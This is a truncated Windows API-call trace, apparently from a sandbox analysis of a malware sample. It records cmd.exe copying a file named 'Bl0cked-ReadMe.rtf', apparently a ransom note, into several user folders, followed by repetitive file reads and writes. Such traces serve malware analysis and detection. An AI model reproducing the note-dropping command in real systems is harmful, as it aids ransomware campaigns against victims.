[0208.866] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"" [0208.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.866] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1f18c8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0208.867] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0208.867] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.867] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.867] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0208.867] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0208.867] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0208.867] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0208.867] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0208.867] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0208.867] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0208.867] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0208.867] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0208.867] GetEnvironmentStringsW () returned 0x1f22b8* [0208.867] FreeEnvironmentStringsW (penv=0x1f22b8) returned 1 [0208.867] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") 
returned 0x1b [0208.867] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0208.867] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0208.867] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0208.867] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0208.867] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0208.867] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0208.867] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0208.867] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0208.867] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0208.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f8b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.867] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f8b0, lpFilePart=0x16f8ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f8ac*="Desktop") returned 0x18 [0208.867] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f62c | out: lpFindFileData=0x16f62c) returned 0x1efff8 [0208.868] FindClose (in: hFindFile=0x1efff8 | out: hFindFile=0x1efff8) returned 1 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f62c | out: lpFindFileData=0x16f62c) returned 0x1efff8 [0208.868] FindClose (in: hFindFile=0x1efff8 | out: hFindFile=0x1efff8) returned 1 [0208.868] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f62c | out: lpFindFileData=0x16f62c) returned 0x1efff8 [0208.868] FindClose (in: hFindFile=0x1efff8 | out: hFindFile=0x1efff8) returned 1 [0208.868] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 
[0208.868] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0208.868] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0208.868] GetEnvironmentStringsW () returned 0x1f2ad8* [0208.868] FreeEnvironmentStringsW (penv=0x1f2ad8) returned 1 [0208.868] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.869] GetConsoleOutputCP () returned 0x1b5 [0208.869] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0208.869] GetUserDefaultLCID () returned 0x409 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f9f0, cchData=128 | out: lpLCData="0") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f9f0, cchData=128 | out: lpLCData="0") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f9f0, cchData=128 | out: lpLCData="1") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0208.869] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 
| out: lpLCData="Sat") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0208.870] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0208.870] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0208.871] GetConsoleTitleW (in: lpConsoleTitle=0x1e08d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.871] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0208.871] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0208.871] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0208.871] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0208.872] _wcsicmp (_String1="type", _String2=")") returned 75 [0208.872] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0208.872] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0208.872] _wcsicmp (_String1="IF", _String2="type") returned -11 [0208.872] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0208.872] _wcsicmp (_String1="REM", _String2="type") returned -2 [0208.872] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0208.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.875] _get_osfhandle (_FileHandle=1) returned 0x7 [0208.875] GetFileType (hFile=0x7) returned 0x2 [0208.875] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0208.875] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f8e8 | out: lpMode=0x16f8e8) returned 1 [0208.875] _dup (_FileHandle=1) returned 3 [0208.875] _close (_FileHandle=1) returned 0 [0208.876] _wcsicmp 
(_String1="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0208.876] CreateFileW (lpFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x16f8b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0208.877] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0208.877] GetConsoleTitleW (in: lpConsoleTitle=0x16f6e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.877] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0208.877] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0208.877] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0208.877] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0208.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0208.878] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x16f24c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16f24c) returned 0x1e0e50 [0208.878] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0208.878] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0208.878] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0208.878] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16e158, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0208.878] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 
[0208.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.878] GetFileType (hFile=0x54) returned 0x1 [0208.878] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.878] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x16e1b0 | out: lpFileSizeHigh=0x16e1b0*=0x0) returned 0x1632 [0208.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.879] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0208.879] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.879] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.880] GetFileType (hFile=0x4c) returned 0x1 [0208.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.880] GetFileType (hFile=0x4c) returned 0x1 [0208.880] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.880] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, 
lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] GetFileType (hFile=0x4c) returned 0x1 [0208.881] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.881] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.881] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.881] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.882] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: 
hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] GetFileType (hFile=0x4c) returned 0x1 [0208.882] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.882] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.882] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.883] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.883] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0208.883] GetFileType (hFile=0x4c) returned 0x1 [0208.883] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.883] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.883] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.884] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.884] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, 
lpOverlapped=0x0 | out: lpBuffer=0x16f088*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f0d8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f128*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f128*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f178*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f178*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] GetFileType (hFile=0x4c) returned 0x1 [0208.884] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.884] WriteFile (in: hFile=0x4c, lpBuffer=0x16f1c8*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f1c8*, lpNumberOfBytesWritten=0x16e1cc*=0x20, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.885] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e1b8 | out: lpNewFilePointer=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=4) returned 0x54 [0208.885] ReadFile (in: hFile=0x54, lpBuffer=0x16efe8, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e1d8, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesRead=0x16e1d8*=0x200, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16efe8*, lpNumberOfBytesWritten=0x16e1cc*=0x50, lpOverlapped=0x0) returned 1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] GetFileType (hFile=0x4c) returned 0x1 [0208.885] _get_osfhandle (_FileHandle=1) returned 0x4c [0208.885] WriteFile (in: hFile=0x4c, lpBuffer=0x16f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e1cc, lpOverlapped=0x0 | out: lpBuffer=0x16f038*, 